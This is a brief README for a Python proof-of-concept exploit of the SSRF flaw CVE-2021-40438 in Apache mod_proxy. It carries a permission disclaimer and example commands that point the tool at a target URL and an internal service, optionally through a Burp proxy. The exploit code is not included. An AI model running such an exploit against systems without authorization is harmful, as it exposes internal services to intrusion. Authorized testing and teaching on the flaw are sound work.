
SSRF exploit proof-of-concept for CVE-2021-40438 targeting Apache mod_proxy. Python script with proxy support for controlled testing and educational demonstrations.
Note: Intended only for educational and controlled testing purposes. Only test on systems you have permission to assess.
░█▀▀░█░█░█▀▀░░░░░▀▀▄░▄▀▄░▀▀▄░▀█░░░░░░█░█░▄▀▄░█░█░▀▀█░▄▀▄
░█░░░▀▄▀░█▀▀░▄▄▄░▄▀░░█/█░▄▀░░░█░░▄▄▄░░▀█░█/█░░▀█░░▀▄░▄▀▄
░▀▀▀░░▀░░▀▀▀░░░░░▀▀▀░░▀░░▀▀▀░▀▀▀░░░░░░░▀░░▀░░░░▀░▀▀░░░▀░
# Basic usage
python3 exploit.py "http://vulnerable-site.com" "http://internal-service/"
# With proxy (e.g., Burp Suite)
python3 exploit.py "http://vulnerable-site.com" "http://internal-service/" --proxy "http://127.0.0.1:8080"
url: The target vulnerable URLssrf: The internal service URL to fetch-p, --proxy: (Optional) HTTP proxy to use for debugging